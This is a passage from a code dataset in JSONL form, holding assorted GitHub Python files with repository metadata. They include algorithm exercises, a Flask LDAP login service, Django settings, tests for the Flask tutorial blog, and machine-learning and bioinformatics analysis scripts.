2:\n return True\n\n def count_score(curr, total):\n if len(curr) <= 2:\n return max(curr)\n # the opponent's choise\n start = count_score(curr[1:], total - curr[0])\n end = count_score(curr[:-1], total - curr[-1])\n return max(total - start, total - end)\n\n return count_score(nums, total) >= total / 2\n\n def PredictTheWinner3(self, nums) -> bool:\n if not len(nums) % 2:\n return True\n def winner(curr, s, e, turn):\n if s == e:\n return turn * curr[s]\n a = turn * curr[s] + winner(curr, s+1, e, -turn)\n b = turn * curr[e] + winner(curr, s, e-1, -turn)\n return turn * max(turn*a, turn*b) # max 里*turn是因为ab里带turn有可能负\n return winner(nums, 0, len(nums)-1, 1) >= 0\n\n\n","repo_name":"arianacai1997/take_your_dog_to_work","sub_path":"486M/486M.py","file_name":"486M.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"24775227596","text":"#! /usr/bin/env python\n\nfrom __future__ import print_function\n\nimport argparse\nimport os.path\nimport subprocess\nimport sys\nimport shutil\nimport tarfile\n\nNONE_FLAG = []\nextra_flags = NONE_FLAG\n\nROOT = os.path.dirname(os.path.abspath(__file__))\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"domain_knowledge\", help=\"path to domain knowledge file\")\n parser.add_argument(\"domain\", help=\"path to domain file\")\n parser.add_argument(\"problem\", help=\"path to problem file\")\n parser.add_argument(\"plan\", help=\"path to output plan file\")\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n # best_model_path = os.join.path(args.dk, \"best_model/model.pt\")\n\n ROOT = os.path.dirname(os.path.abspath(__file__))\n REPO_GNN_LEARNING = f\"{ROOT}/gnn-learning\"\n SCORPION_PATH = f\"{ROOT}/scorpion\"\n\n DK_DIR_FILE = args.domain_knowledge\n DOMAIN = args.domain\n PROBLEM = args.problem\n PLAN_OUT = args.plan\n\n dk_folder = f\"extracted\"\n\n # uncompress domain knowledge file\n with tarfile.open(args.domain_knowledge, \"r:gz\") as tar:\n if os.path.exists(dk_folder):\n shutil.rmtree(dk_folder)\n tar.extractall(dk_folder)\n\n\n \n # DK_DIR = f'{ROOT}/DK'\n\n # if os.path.exists(DK_DIR):\n # shutil.rmtree(DK_DIR)\n # os.mkdir(DK_DIR)\n\n # shutil.unpack_archive(DK_DIR_FILE, DK_DIR ,'zip')\n \n model_path = os.path.join(dk_folder, \"model.pt\")\n # preprocessor_settings = os.path.join(dk_folder, \"DK\", \"preprocessor_settings.txt\")\n preprocessor_settings = \"gnn-retries,2,gnn-threshold,0.5,model-path,extracted/DK/model.pt\"\n\n\n subprocess.check_call(\n [f'{SCORPION_PATH}/fast-downward.py']\n + extra_flags + [\n '--alias', 'lama-first',\n '--keep-sas-file',\n '--transform-task-options', preprocessor_settings,\n '--transform-task', f'{REPO_GNN_LEARNING}/src/preprocessor.command',\n '--overall-time-limit', '2400',\n '--search-time-limit', '500',\n DOMAIN,\n PROBLEM])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ipc2023-learning/repo01","sub_path":"plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8393689973","text":"import click\nimport os\nimport logging\nimport string\nimport random\nimport sys\nimport yaml\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom bubblechamber.model import Base\nfrom bubblechamber.model import File as BCFile\nfrom bubblechamber.model import Process as BCProcess\nfrom 
bubblechamber.model import Container as BCContainer\nfrom bubblechamber.model import ApiKey as BCApiKey\n\ndef __load_config(debug):\n config_file = 'config.yml'\n if 'BC_CONFIG' in os.environ:\n config_file = os.environ['BC_CONFIG']\n\n config = {}\n if os.path.exists(config_file):\n with open(config_file, 'r') as ymlfile:\n config = yaml.load(ymlfile)\n\n if debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n if os.environ.get('BC_MYSQL_URL', None):\n config['mysql']['url'] = os.environ['BC_MYSQL_URL']\n\n return config\n\n\n@click.group()\ndef run():\n pass\n\n@run.command()\n@click.option('--api', help='API key')\n@click.option('--debug', help=\"set log level to debug\", is_flag=True)\ndef delete(api, debug):\n if not api:\n print(\"Api key missing\")\n sys.exit(1)\n\n cfg = __load_config(debug)\n engine = create_engine(cfg['mysql']['url'], pool_recycle=3600, echo=cfg['mysql'].get('debug', False))\n maker = sessionmaker(bind=engine)\n sqlSession = maker()\n # generate api key\n bc_apikey = sqlSession.query(BCApiKey).filter_by(key=api).first()\n if bc_apikey:\n sqlSession.delete(bc_apikey)\n sqlSession.commit()\n else:\n print(\"No matching apikey found\")\n sqlSession.close()\n\n@run.command()\n@click.option('--owner', help='API key user owner')\n@click.option('--debug', help=\"set log level to debug\", is_flag=True)\ndef create(owner, debug):\n if not owner:\n print(\"Owner missing\")\n sys.exit(1)\n\n cfg = __load_config(debug)\n engine = create_engine(cfg['mysql']['url'], pool_recycle=3600, echo=cfg['mysql'].get('debug', False))\n maker = sessionmaker(bind=engine)\n sqlSession = maker()\n # generate api key\n key = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(10))\n bc_apikey = BCApiKey(\n key=key,\n email=owner\n )\n sqlSession.add(bc_apikey)\n sqlSession.commit()\n sqlSession.close()\n print(\"Api key: %s\" % (key))\n return key\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"osallou/sysdig-analyser","sub_path":"bc_api.py","file_name":"bc_api.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"5823351936","text":"class Student:\r\n def __init__(self, name, surname, student_id, course, faculty, speciality):\r\n self.full_name = f\"{name} {surname}\"\r\n self.id = student_id\r\n self.s_course = course\r\n self.s_faculty = faculty\r\n self.speciality = speciality\r\n self.is_local_student = False\r\n self.subjects = []\r\n self.semester = 1\r\n\r\n def AllInfo(self):\r\n print(f\"full name: {self.full_name}\")\r\n print(f\"id: {self.id}\")\r\n print(f\"course: {self.s_course}\")\r\n print(f\"faculty: {self.s_faculty.faculty_name}\")\r\n print(f\"speciality: {self.speciality}\")\r\n print(f\"is local student: {self.is_local_student}\")\r\n print(f\"subjects: {', '.join(self.subjects)}\")\r\n print(f\"semester: {self.semester}\")\r\n\r\n def add_subject(self, subject):\r\n self.subjects.append(subject)\r\n\r\n def transfer_to_next_semester(self):\r\n self.semester += 1\r\n next_course = (self.semester - 1) // 2 + 1\r\n self.s_course = next_course\r\n self.subjects.clear()\r\n\r\n\r\nclass Faculty:\r\n def __init__(self, name, dean, cabinet_number):\r\n self.faculty_name = name\r\n self.dean = dean\r\n self.cabinet_number = cabinet_number\r\n self.students = []\r\n\r\n def add_student(self, student):\r\n self.students.append(student)\r\n student.s_faculty = self\r\n\r\n def 
withdraw_student(self, student_id):\r\n for student in self.students:\r\n if student.id == student_id:\r\n self.students.remove(student)\r\n student.s_faculty = None\r\n break\r\n\r\n\r\ndef main():\r\n faculty1 = Faculty(\"Math\", \"Mr. Arman\", \"Cabinet 99\")\r\n faculty2 = Faculty(\"Computer Science\", \"Dr. Darkhan\", \"Cabinet 23\")\r\n\r\n student1 = Student(\"Alan\", \"Tasbulatov\", 115, 3, faculty1, \"Big Data\")\r\n student2 = Student(\"Bauyrzhan\", \"Sikhymbek\", 251, 3, faculty1, \"Oil Engineering\")\r\n student3 = Student(\"Yu\", \"Alexandr\", 390, 3, faculty2, \"IT C#\")\r\n\r\n faculty1.add_student(student1)\r\n faculty1.add_student(student2)\r\n faculty2.add_student(student3)\r\n\r\n # removed student with student_id = 251: Bauyrzhan Sikhymbek \r\n faculty1.withdraw_student(251)\r\n\r\n print(f\"students of {faculty1.faculty_name}:\")\r\n for student in faculty1.students:\r\n student.AllInfo()\r\n\r\n print()\r\n\r\n print(f\"students of {faculty2.faculty_name}:\")\r\n for student in faculty2.students:\r\n student.AllInfo()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Disarray77/ObjectOrientedProg","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"29480712866","text":"import os, glob, importlib\n\n_path = os.path.dirname(os.path.abspath(__file__))\nhandlers = []\n\nfor h in [\".{}\".format(os.path.basename(x).replace(\".py\", \"\")) for x in glob.glob(\"{}/*.py\".format(_path)) if \"__init__\" not in x]:\n handlers.append(importlib.import_module(h, \"galvatron_lib.core.location_handlers\"))\n\nhandlers = sorted(handlers, key=lambda m: m.priority)\n\ndef get_handler(location):\n handler = [x for x in handlers if x.handles(location)][0]\n return handler\n","repo_name":"bad-hombres/galvatron","sub_path":"galvatron_lib/core/location_handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"22339126109","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport testData as d\nimport sys, json, uuid\nfrom ldap3 import Server, Connection, ALL, NTLM, SUBTREE\nfrom ldap3.core.exceptions import LDAPBindError\nfrom datetime import datetime, timedelta\nfrom pprint import pprint\n# configuration\nDEBUG = True\n\n# instantiate the app\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# enable CORS\nCORS(app)\n\n# sanity check route\n@app.route('/login', methods=['POST'])\ndef login():\n response_object = {'status': 'success',\n 'message': 'Auth Accepted'}\n post_data = request.get_json()\n given_login = post_data['user_login']\n login = \"KZGROUP\\\\\" + given_login # domain to database and admin page\n passwd = post_data['pass']\n server = Server('kzgroup.local', get_info=ALL)\n try:\n with Connection(server, user=login,password=passwd,\n authentication=NTLM, auto_bind=True) as conn:\n conn.search('DC=kzgroup,DC=local',\n \"(&(sAMAccountName=\" + given_login + \"))\",\n attributes=['mail'])\n mailbox = conn.entries[0]['mail']\n # to database\n conn.search('DC=kzgroup,DC=local',\n \"(&(sAMAccountName=\" + given_login + \"))\",\n SUBTREE,\n attributes=['memberof'])\n rawGroups=conn.entries[0]['memberof'].values\n groups=[]\n for group in rawGroups:\n groups.append(group.split(',')[0][3:])\n conn.unbind()\n response_object['userlogin'] = 
given_login # to database\n response_object['token'] = uuid.uuid4().hex # to database\n response_object['tokenExp'] = datetime.now() + timedelta(days=2) # to database\n pprint( response_object['tokenExp'] )\n return jsonify(response_object), 200\n except LDAPBindError as err:\n response_object['message'] = \"Invalid Credentials\"\n response_object['status'] = \"warning\"\n return jsonify(response_object), 401\n\n@app.route('/prod_db', methods=['GET','POST'])\ndef prod_db():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n post_data = request.get_json()\n d.prodData.append({\n 'title': post_data.get('title'),\n 'responsible': post_data.get('responsible'),\n 'production': post_data.get('production')\n })\n response_object['message'] = 'DB added!'\n else:\n response_object['dbs'] = d.prodData\n return jsonify(response_object)\n\n@app.route('/dev_db', methods=['GET','POST'])\ndef dev_db():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n post_data = request.get_json()\n d.devData.append({\n 'title': post_data.get('title'),\n 'responsible': post_data.get('responsible'),\n 'production': post_data.get('production')\n })\n response_object['message'] = 'DB added!'\n else:\n response_object['dbs'] = d.devData\n return jsonify(response_object)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=3000)\n\n","repo_name":"major-sam/py_server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"39546230107","text":"import math\n\ndef main():\n #escribe tu código abajo de esta línea\n ap = float(input(\"Area a pintar en metros: \"))\n r = float(input(\"Rendimiento (m2/l): \"))\n cl = math.ceil(ap/r)\n print(\"Litros a comprar:\",cl)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"C-SIN-TC1028-002-2113/ses03-ej1-valeriaaaen","sub_path":"assignments/13CantidadLitrosPintura/src/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21849002637","text":"import os.path\nfrom setuptools import setup\n\n# The directory containing this file\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n# The text of the README file\nwith open(os.path.join(HERE, \"README.md\")) as fid:\n README = fid.read()\n\n# This call to setup() does all the work\nsetup(\n name=\"vaccine-slot-finder\",\n version=\"0.0.1\",\n description=\"The Project to find the vaccine on the basis of age, location, district, pincode, available slot and notified via email, slack or google chat\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/shubham-mahajan/vaccine-slot-finder\",\n author=\"Shubham Mahajan\",\n author_email=\"contact@binarybugs.com\",\n license=\"MIT\",\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n ],\n packages=[\"reader\"],\n include_package_data=True,\n install_requires=[\n \"requests\", \"python-dotenv\"\n ]\n)","repo_name":"shubham-mahajan/vaccine-slot-finder","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"23643396729","text":"'''\n 斐波那数列 \n 1,1,2,3,5,8,13,21,34...\n'''\nimport time\n\ndef 
fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a,b = b,a+b\n n += 1\n return \"done\"\n\nfib(10) \n\n# 生成器--解决如果max过大会导致卡顿问题\ndef fib_list(max):\n n, a, b = 0, 0, 1\n while n < max:\n # 转化成生成器\n yield b\n a,b = b,a+b\n n += 1\n # 用语异常打印效果\n return \"done\"\n\nf = fib_list(100)\n\n# 唤醒\nprint(f.__next__())\nprint(f.__next__())\nprint(f.__next__())\nprint(f.__next__())\nprint(f.__next__())\n\n# 生成器的运用\ndef consumer(name):\n print(name + \"准备...\")\n while True:\n baozi = yield\n print(name + \"吃包子\")\n\ndef producer(name):\n c = consumer(\"A\")\n cx = consumer(\"B\")\n c.__next__()\n cx.__next__()\n print(\"开始测试\")\n for i in range(10):\n time.sleep(1)\n print(\"测试执行\")\n c.send(i)\n cx.send(i)\n\n\nproducer(\"lxw\")","repo_name":"HardProgrammer/pythonRoad","sub_path":"com/demo/fibfunction.py","file_name":"fibfunction.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70338694988","text":"import os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Database\n# https://docs.djangoproject.com/en/2.0/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.postgresql_psycopg2\",\n \"NAME\": os.environ.get(\"DATABASE_NAME\", \"accounts\"),\n \"USER\": os.environ.get(\"DATABASE_USER\", \"postgres\"),\n \"PASSWORD\": os.environ.get(\"DATABASE_PASSWORD\", \"secret\"),\n \"HOST\": os.environ.get(\"DATABASE_HOST\", \"localhost\"),\n \"PORT\": os.environ.get(\"DATABASE_PORT\", \"5496\"),\n }\n}\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.0/howto/static-files/\n\nSTATIC_URL = \"/static/\"\nSTATICFILES_LOCATION = \"static\"\nSTATIC_ROOT = BASE_DIR + \"/static\"\nSTATICFILES_DIRS = [os.path.join(BASE_DIR, 'assets')]\n\nMEDIAFILES_LOCATION = 'media'\nMEDIA_URL = '/media/'\nMEDIA_ROOT = BASE_DIR + '/' + MEDIAFILES_LOCATION\n\n# CORS\n\nCORS_ALLOWED_ORIGINS = [\n \"http://localhost:3000\"\n]\n\nALLOWED_HOSTS = [\n \"0.0.0.0\",\n \"127.0.0.1\",\n \"localhost\"\n]\n\nCSRF_TRUSTED_ORIGINS = [\n \"http://localhost:3000\"\n]\n","repo_name":"JokusPokus/assessment-scheduler","sub_path":"backend/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"75193605389","text":"import torch\nfrom utils import AverageMeter\nimport time\nimport numpy as np\n\nimport os\nimport data_manager\nfrom model import ft_net, ft_net_dense\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\nimport scipy.io\nfrom dataset_loader import ImageDataset\n\n\nimport argparse\nparser = argparse.ArgumentParser(description='Training')\nparser.add_argument('--model_path', default='resnet', type=str, help='save model path')\nparser.add_argument('--batchsize', default=32, type=int, help='batchsize')\nparser.add_argument('--use_dense', action='store_true', help='use densenet')\nparser.add_argument('--n_classe', default=1367, help='n classes')\nparser.add_argument('--dataset', default='/home/paul/datasets', type=str, help='Path to the dataset')\n\nopt = parser.parse_args()\nn_classe = opt.n_classe\n\ndef test(model, queryloader, galleryloader, use_gpu, ranks=[1, 5, 10, 20]):\n batch_time = AverageMeter()\n\n model.eval()\n\n with torch.no_grad():\n qf, q_pids, q_camids = [], [], []\n for batch_idx, (imgs, pids, camids) in enumerate(queryloader):\n if use_gpu: 
imgs = imgs.cuda()\n\n end = time.time()\n features = model(imgs)\n batch_time.update(time.time() - end)\n\n features = features.data.cpu()\n qf.append(features)\n q_pids.extend(pids)\n q_camids.extend(camids)\n qf = torch.cat(qf, 0)\n q_pids = np.asarray(q_pids)\n q_camids = np.asarray(q_camids)\n\n print(\"Extracted features for query set, obtained {}-by-{} matrix\".format(qf.size(0), qf.size(1)))\n\n gf, g_pids, g_camids = [], [], []\n end = time.time()\n for batch_idx, (imgs, pids, camids) in enumerate(galleryloader):\n if use_gpu: imgs = imgs.cuda()\n\n end = time.time()\n features = model(imgs)\n batch_time.update(time.time() - end)\n\n features = features.data.cpu()\n gf.append(features)\n g_pids.extend(pids)\n g_camids.extend(camids)\n gf = torch.cat(gf, 0)\n g_pids = np.asarray(g_pids)\n g_camids = np.asarray(g_camids)\n\n print(\"Extracted features for gallery set, obtained {}-by-{} matrix\".format(gf.size(0), gf.size(1)))\n\n print(\"==> BatchTime(s)/BatchSize(img): {:.3f}/{}\".format(batch_time.avg, 32))\n\n m, n = qf.size(0), gf.size(0)\n distmat = torch.pow(qf, 2).sum(dim=1, keepdim=True).expand(m, n) + \\\n torch.pow(gf, 2).sum(dim=1, keepdim=True).expand(n, m).t()\n distmat.addmm_(1, -2, qf, gf.t())\n distmat = distmat.numpy()\n # Save to Matlab for check\n result = {'distmat':distmat, 'q_pids': q_pids, 'g_pids':g_pids,\n 'q_camids':q_camids, 'g_camids': g_camids,\n 'query_feature': qf.numpy(), 'gallery_feature': gf.numpy()}\n print(qf.numpy())\n print(gf.numpy())\n scipy.io.savemat('./result.mat', result)\n\n\n\ndef load_network(network):\n save_path = os.path.join(opt.model_path)\n network.load_state_dict(torch.load(save_path))\n return network\n\n# --------\n\nuse_dense = opt.use_dense\nif __name__ == '__main__':\n\n use_gpu = torch.cuda.is_available()\n data_transforms = transforms.Compose([\n transforms.Resize((288, 144), interpolation=3),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n\n ])\n\n if opt.use_dense:\n model_structure = ft_net_dense(n_classe)\n else:\n model_structure = ft_net(n_classe)\n model = load_network(model_structure)\n # Change to test mode\n model = model.eval()\n if use_gpu:\n model = model.cuda()\n\n dataset = data_manager.init_img_dataset(\n root=opt.dataset, name='cuhk03', split_id=0, cuhk03_classic_split=True)\n\n queryloader = DataLoader(\n ImageDataset(dataset.query, transform=data_transforms),\n batch_size=32, shuffle=False, num_workers=4, drop_last=False,\n )\n\n galleryloader = DataLoader(\n ImageDataset(dataset.gallery, transform=data_transforms),\n batch_size=32, shuffle=False, num_workers=4, drop_last=False,\n )\n test(model, queryloader, galleryloader, use_gpu)","repo_name":"jpainam/SLS_ReID","sub_path":"test_cuhk03.py","file_name":"test_cuhk03.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"82"} +{"seq_id":"72111093069","text":"import pytest\n\nfrom flaskr.db import get_db\n\n\ndef test_index(client, auth):\n response = client.get(\"/\")\n assert b\"Log In\" in response.data\n assert b\"Register\" in response.data\n\n auth.login()\n response = client.get(\"/\")\n assert b\"test title\" in response.data\n assert b\"by test on 2018-01-01\" in response.data\n assert b\"test\\nbody\" in response.data\n assert b'href=\"/1/update\"' in response.data\n\n\n@pytest.mark.parametrize(\"path\", (\"/create\", \"/1/update\", \"/1/delete\"))\ndef test_login_required(client, path):\n response = 
client.post(path)\n assert response.headers[\"Location\"] == \"/auth/login\"\n\n\ndef test_author_required(app, client, auth):\n # change the post author to another user\n with app.app_context():\n db = get_db()\n db.execute(\"UPDATE post SET author_id = 2 WHERE id = 1\")\n db.commit()\n\n auth.login()\n # current user can't modify other user's post\n assert client.post(\"/1/update\").status_code == 403\n assert client.post(\"/1/delete\").status_code == 403\n # current user doesn't see edit link\n assert b'href=\"/1/update\"' not in client.get(\"/\").data\n\n\n@pytest.mark.parametrize(\"path\", (\"/2/update\", \"/2/delete\"))\ndef test_exists_required(client, auth, path):\n auth.login()\n assert client.post(path).status_code == 404\n\n\ndef test_create(client, auth, app):\n auth.login()\n assert client.get(\"/create\").status_code == 200\n client.post(\"/create\", data={\"title\": \"created\", \"body\": \"\"})\n\n with app.app_context():\n db = get_db()\n count = db.execute(\"SELECT COUNT(id) FROM post\").fetchone()[0]\n assert count == 2\n\n\ndef test_update(client, auth, app):\n auth.login()\n assert client.get(\"/1/update\").status_code == 200\n client.post(\"/1/update\", data={\"title\": \"updated\", \"body\": \"\"})\n\n with app.app_context():\n db = get_db()\n post = db.execute(\"SELECT * FROM post WHERE id = 1\").fetchone()\n assert post[\"title\"] == \"updated\"\n\n\n@pytest.mark.parametrize(\"path\", (\"/create\", \"/1/update\"))\ndef test_create_update_validate(client, auth, path):\n auth.login()\n response = client.post(path, data={\"title\": \"\", \"body\": \"\"})\n assert b\"Title is required.\" in response.data\n\n\ndef test_delete(client, auth, app):\n auth.login()\n response = client.post(\"/1/delete\")\n assert response.headers[\"Location\"] == \"/\"\n\n with app.app_context():\n db = get_db()\n post = db.execute(\"SELECT * FROM post WHERE id = 1\").fetchone()\n assert post is None\n","repo_name":"pallets/flask","sub_path":"examples/tutorial/tests/test_blog.py","file_name":"test_blog.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":65003,"dataset":"github-code","pt":"82"} +{"seq_id":"39859451094","text":"import streamlit as st\nfrom mongo_utils import get_mongo_db\nfrom libros import get_libros\nfrom bson import ObjectId\nimport datetime\nfrom datetime import date\nimport time\n\ndb = get_mongo_db()\n\n# Function to create a new prestamo\ndef create_prestamo(user_id, book_id, loan_date, return_date):\n # Save the data to the database\n prestamos_col = db['prestamos']\n prestamo_data = {\n 'user_id': user_id,\n 'book_id': book_id,\n 'loan_date': loan_date,\n 'return_date': return_date\n }\n prestamos_col.insert_one(prestamo_data)\n\n# Function to update an existing prestamo\ndef update_prestamo(id, user_id, book_id, loan_date, return_date):\n # Save the updated data to the database\n prestamos_col = db['prestamos']\n prestamo_data = {\n 'user_id': user_id,\n 'book_id': book_id,\n 'loan_date': loan_date,\n 'return_date': return_date\n }\n prestamos_col.update_one({'_id': id}, {'$set': prestamo_data})\n\n# Function to update a prestamo with a form\ndef update_prestamo_form(prestamo_id):\n prestamos_col = db['prestamos']\n row = prestamos_col.find_one({'_id': prestamo_id})\n with st.form(key='update_prestamo_form'):\n user_id = st.session_state.usuario \n book_id = st.selectbox('Select book:', get_libros())\n loan_date = st.date_input('Loan Date:', value=datetime.datetime.strptime(row['loan_date'], '%Y-%m-%d').date(), 
min_value=date.today())\n        return_date = st.date_input('Return Date:', value=datetime.datetime.strptime(row['return_date'], '%Y-%m-%d').date(), min_value=date.today())\n        if st.form_submit_button(\"Confirm Update\"):\n            # Update the prestamo when the button is clicked\n            update_prestamo(id=row['_id'], user_id=user_id, book_id=book_id, loan_date=loan_date.isoformat(), return_date=return_date.isoformat())\n\n# Function to delete an existing prestamo\ndef delete_prestamo(prestamo_id):\n    prestamos_col = db['prestamos']\n    prestamo = prestamos_col.find_one({'_id': prestamo_id})\n\n    if prestamo:\n        prestamos_col.delete_one({'_id': prestamo['_id']})\n        print(f\"Prestamo {prestamo_id} deleted successfully.\")\n    else:\n        print(f\"Prestamo {prestamo_id} not found.\")\n\n# Function to retrieve a list of prestamos\ndef get_prestamos():\n    prestamos_col = db['prestamos']\n    cursor = prestamos_col.find({})\n    prestamos = [{'_id': prestamo['_id'], 'user_id': prestamo['user_id'], 'book_id': prestamo['book_id'],\n                  'loan_date': prestamo['loan_date'], 'return_date': prestamo['return_date']} for prestamo in cursor]\n    return prestamos\n\n\ndef prestamosApp():\n    prestamo_operations = ['Create Prestamo', 'Update Prestamo', 'Delete Prestamo']\n    operation = st.selectbox('Select operation:', prestamo_operations)\n    \n    if operation == 'Create Prestamo':\n        # Collect the data for the new prestamo\n        today = date.today()\n        user_id = st.session_state.usuario \n        book_id = st.selectbox('Select book:', get_libros())\n        loan_date = st.date_input('Loan Date:', min_value=today)\n        return_date = st.date_input('Return Date:')\n        \n        create_prestamo_button = st.button(\"Confirm Creation\")\n        if create_prestamo_button:\n            create_prestamo(user_id=user_id, book_id=book_id, loan_date=loan_date.isoformat(), return_date=return_date.isoformat())\n    \n    elif operation == 'Update Prestamo':\n        # Retrieve the list of prestamos\n        prestamos = get_prestamos()\n        # Create a dropdown menu to select the prestamo to update\n        prestamo_to_update = st.selectbox('Select prestamo to update:', prestamos)\n        # Call the update_prestamo_form function with the selected prestamo\n        update_prestamo_button = st.button(\"Get form\")\n        \n        if update_prestamo_button:\n            print(ObjectId(prestamo_to_update['_id']))\n            update_prestamo_form(prestamo_id=ObjectId(prestamo_to_update['_id']))\n    \n    elif operation == 'Delete Prestamo':\n        # Retrieve the list of prestamos\n        prestamos = get_prestamos()\n        # Create a dropdown menu to select the prestamo to delete\n        prestamo_to_delete = st.selectbox('Select prestamo to delete:', prestamos)\n        # Call the delete_prestamo function with the selected prestamo\n        delete_prestamo_button = st.button(\"Confirm Deletion\")\n        \n        if delete_prestamo_button:\n            delete_prestamo(prestamo_id=prestamo_to_delete['_id'])\n","repo_name":"JEMata16/ProyectoBDNoSQL","sub_path":"prestamos.py","file_name":"prestamos.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"2716111418","text":"# Clearing the screen\nimport os\nos.system(\"clear\")\n\n# Calculating the year someone was born\nidade = int(input(\"How many years will you turn / did you turn this year? \"))\nprint(\"You were born in the year:\",2018 - idade,end=\"\\n\\n\")\n\n# Converting your age into days\nidade = int(input(\"What is your age? \"))\nprint(\"Your age in days is:\",idade * 365,end=\"\\n\\n\")\n\n# Alive for so many hours\nidade = int(input(\"What is your age? \"))\nprint(\"You have been alive for:\",idade*365*24,\"hours.\")","repo_name":"sylviocesart/curso_python","sub_path":"Ignorância_Zero/aula07/idade.py","file_name":"idade.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"40383737396","text":"class students:\n    __test = \"hello\"\n    def __init__(self,age, name = \"student\"):\n        self.age = age\n        self.name = name\n    \n\n\n    \n\n    def avgscore(self,score_1,score_2,score_3):\n        return (score_1 + score_2 + score_3)/3\n\nstudent1 = students(25,)\nprint(student1.avgscore(20,40,60))\nprint(getattr(student1,\"name\"))\nstudent2 = students(25,\"bill\")\nprint(student2._students__test)\n","repo_name":"MattCrutchley/python_excersises","sub_path":"applications/oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"15328682134","text":"range(100)  # a lazy range object (generator-like): values are produced on demand\ndef make_list(num):\n    result = []\n    for i in range(num):  # the range itself is never held in memory\n        result += [i*2]\n    return result\n\nmy_list = make_list(20000000)  # we wait while the whole list is built in memory; a lazy range would not need that\nprint('done')\n
= np.array(pvals.values[i,:])\n sig_bool = lr_pvals < .05\n lr_ccis = cci_names[sig_bool]\n for j, cci in enumerate(lr_ccis):\n c1, c2 = cci.split('--')\n row = np.where(cell_type_set==c1)[0][0]\n col = np.where(cell_type_set==c2)[0][0]\n int_matrix[row,col] += 1\n\nint_df = pd.DataFrame(int_matrix, index=cell_type_set, columns=cell_type_set)\n\nint_df.to_csv(out_dir+'squidpy_ints.txt', sep='\\t', header=True)\n\n","repo_name":"BiomedicalMachineLearning/stlearn_manuscript","sub_path":"Main_figure_4_5_CCI_with_Sup/scripts/X2_method_comp_clusters/X6_squidpy_cpdb_cluster.py","file_name":"X6_squidpy_cpdb_cluster.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"6984807684","text":"import glob\nimport logging\nimport os\nfrom argparse import Namespace\n\nfrom exceptions.pymage_exceptions import NotAbleToDownloadException\nfrom parsers.parser_factory import ParserFactory\nfrom utils.utils import download_images\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Downloader:\n\n def __init__(self, filename_pattern: str):\n\n if \"%s\" not in filename_pattern:\n raise ValueError(\"'%s' placeholder not found in filename_pattern and it is needed for duplicate detection.\")\n\n self.filename_pattern = filename_pattern\n\n self.parser = None\n self.args = None\n\n def 